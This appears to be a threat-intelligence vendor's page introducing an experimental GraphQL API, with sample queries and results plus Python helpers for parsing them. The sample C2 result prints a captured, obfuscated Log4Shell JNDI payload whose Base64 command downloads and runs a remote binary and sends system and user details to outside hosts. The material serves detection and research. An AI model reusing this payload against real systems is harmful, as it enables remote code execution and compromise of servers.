This is an experimental blueprint service available at https://api.labs.greynoise.io. This authenticated GraphQL API opens up a whole new world of possibilities, exposing queries that tap into the vast data lake of GreyNoise.
We’re excited to see how our users will engage with this data and discover new use cases. To get started, you’ll need to sign up for a GreyNoise account here to authenticate to the Labs API.
For the latest queries and examples, make sure to check out our comprehensive documentation.
Please note that this is a blueprint and not intended for direct use in production or critical workflows. While we haven’t released any client SDKs at this time, schema introspection is enabled, allowing others to quickly build their own experimental tools if they wish.
Ready to dive in? Click Here to get started.
Availability
This is a free, experimental API. There are no guarantees of its availability, performance, or longevity. The team intends to build scheduled deprecation into new queries, and those schedules will be captured in the documentation. This lets us focus on continually enabling new functionality and on determining whether that functionality is useful enough to warrant becoming a production endpoint or query.
Limits
For each available query, this API exposes only a percentage of the most useful results. Additionally, this API has a rate limit that is captured in the documentation site.
Queries
Currently this API exposes three primary sources of data. The request and response formats are likely to change a bit during this first release as we tweak things, so please rely on the generated documentation above over any examples within this article.
Popular IPs
A list of IPs commonly searched by GreyNoise users including the number of users that requested them and how often they were requested.
We understand the privacy implications of releasing this data and require consensus above a threshold before metadata on a popular IP can be shared. No user data is released within this query nor will ever be included in queries from this API.
QUERY
query popularIPs {
  listPopularIPs {
    ip
    request_count
    users_count
  }
}
RESULTS (truncated)
{
  "data": {
    "listPopularIPs": [
      {
        "ip": "157.240.225.39",
        "users_count": 9,
        "request_count": 80
      },
      {
        "ip": "52.216.32.201",
        "users_count": 8,
        "request_count": 20
      },
      {
        "ip": "181.197.200.69",
        "users_count": 6,
        "request_count": 25
      }
    ]
  }
}
Possible C2s
A list of possible C2s along with extracted domains, IPs, the original payload, and metadata about these potential C2s to provide context on pervasiveness and rate.
QUERY
query listC2s {
  listC2s {
    c2_domains
    c2_ips
    hits
    payload
    pervasiveness
    source_ip
  }
}
RESULTS (truncated)
{
  "source_ip": "95.214.55.244",
  "c2_domains": [
    "[]"
  ],
  "c2_ips": [
    "[129.151.84.124]"
  ],
  "hits": 2599,
  "payload": "GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkpOyBzdWRvIGN1cmwgaHR0cDovLzEyOS4xNTEuNjQuNTUvYXJjaC8kKHVuYW1lIC1tKS91c2VyLyQod2hvYW1pKQ==}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0",
  "pervasiveness": 18
}
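The listC2s result above returns c2_domains and c2_ips as bracketed strings, and its payload hides a Log4j-style JNDI lookup behind ${env:NaN:-j} default-value lookups. The Python below is an added example, not GreyNoise code: it normalises those fields and recovers the callback host so it can be checked against the extracted C2 values. The record is constructed from the result above with the Base64 segment replaced by a placeholder, and all function names are hypothetical.

```python
import re

# Constructed record shaped like the listC2s result above; the Base64 command
# segment of the real payload is replaced by the placeholder "QUJD".
SAMPLE = {
    "source_ip": "95.214.55.244",
    "c2_domains": ["[]"],
    "c2_ips": ["[129.151.84.124]"],
    "payload": "GET / HTTP/1.1\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}"
               "${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/"
               "Command/Base64/QUJD}')\r\n",
}

# Innermost ${prefix:key:-default} lookup, i.e. one with no nested "${" inside.
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# A de-obfuscated JNDI lookup: scheme, host and optional port.
_JNDI = re.compile(r"\$\{jndi:(\w+)://([^/:}\s]+)(?::(\d+))?", re.I)


def unbracket(values):
    """Turn ["[a, b]"] or ["[]"] (a list serialised as a string) into a real list."""
    out = []
    for v in values:
        out += [p.strip() for p in v.strip("[]").split(",") if p.strip()]
    return out


def deobfuscate(payload, max_rounds=10):
    """Collapse default-value lookups such as ${env:NaN:-j} to their default."""
    for _ in range(max_rounds):  # bounded, so hostile input cannot loop forever
        collapsed = _DEFAULT.sub(r"\1", payload)
        if collapsed == payload:
            break
        payload = collapsed
    return payload


def jndi_callbacks(record):
    """Return (scheme, host, port, host_listed_in_c2_fields) per JNDI lookup."""
    known = set(unbracket(record["c2_ips"]) + unbracket(record["c2_domains"]))
    hits = _JNDI.findall(deobfuscate(record["payload"]))
    return [(s.lower(), h, int(p) if p else None, h in known) for s, h, p in hits]
```

A callback host that is missing from both c2_ips and c2_domains is worth a second look before the record is used for blocking or enrichment.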
HTTP Requests
An aggregation of HTTP request paths, bodies, and user agents, along with metadata about these requests, to provide context on a payload's pervasiveness and rate.
QUERY
query HTTPRequests {
  listHTTPRequests {
    date
    method
    path
    pervasiveness
    request_headers
    request_count
    source_ip_count
  }
}
RESULTS (truncated)
{
  "data": {
    "listHTTPRequests": [
      {
        "date": "2023-04-14",
        "method": "GET",
        "path": "/hudson",
        "pervasiveness": 100,
        "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 zgrab/0.x]",
        "request_count": 3063,
        "source_ip_count": 146
      },
      {
        "date": "2023-04-14",
        "method": "GET",
        "path": "/",
        "pervasiveness": 100,
        "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)]",
        "request_count": 18023,
        "source_ip_count": 54
      }
    ]
  }
}
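In the listHTTPRequests result above, request_headers arrives as one flattened string rather than a map, so pivoting on User-Agent needs a small parser. The Python below is an added example, not GreyNoise code: it splits that string without breaking header values that contain ", " and totals request counts per User-Agent. The header format is inferred from the two rows shown, the third row is a constructed edge case, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed rows: the first two mirror the result above, the third is an
# invented edge case whose Accept value itself contains ", ".
ROWS = [
    {"path": "/hudson", "request_count": 3063, "source_ip_count": 146,
     "request_headers": "[Accept:*/*, Accept-Encoding:gzip, "
                        "User-Agent:Mozilla/5.0 zgrab/0.x]"},
    {"path": "/", "request_count": 18023, "source_ip_count": 54,
     "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 "
                        "(compatible; CensysInspect/1.1; +https://about.censys.io/)]"},
    {"path": "/login", "request_count": 10, "source_ip_count": 5,
     "request_headers": "[Accept:application/json, text/plain, */*, "
                        "User-Agent:curl/8.0]"},
]

# Split only at a ", " that is followed by a header name and a colon, so that
# "application/json, text/plain" stays inside one value.
_SPLIT = re.compile(r", (?=[A-Za-z][A-Za-z0-9-]*:)")


def parse_headers(flat):
    """Parse "[Name:value, Name:value]" into a dict keyed by lower-case name."""
    inner = flat[1:-1] if flat.startswith("[") and flat.endswith("]") else flat
    headers = {}
    for field in _SPLIT.split(inner):
        name, sep, value = field.partition(":")
        if sep:  # skip fragments that carry no "name:value" pair
            headers[name.strip().lower()] = value.strip()
    return headers


def by_user_agent(rows):
    """Total request_count and collect requested paths for each User-Agent."""
    totals = defaultdict(lambda: {"requests": 0, "paths": set()})
    for row in rows:
        ua = parse_headers(row["request_headers"]).get("user-agent", "")
        totals[ua]["requests"] += row["request_count"]
        totals[ua]["paths"].add(row["path"])
    return dict(totals)
```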
Helpful Hints
You can clear out the existing query, then navigate to the query explorer on the left-hand side and create a new query with point and click.
If you prefer to live in the CLI, you can use Copy as cURL on the left-hand side under the tool panel. This will also copy your current authentication header, which will expire after a set period of time. You can just log back into the API to get a new one.
After a query finishes in the Playground you can download the JSON results on the bottom right.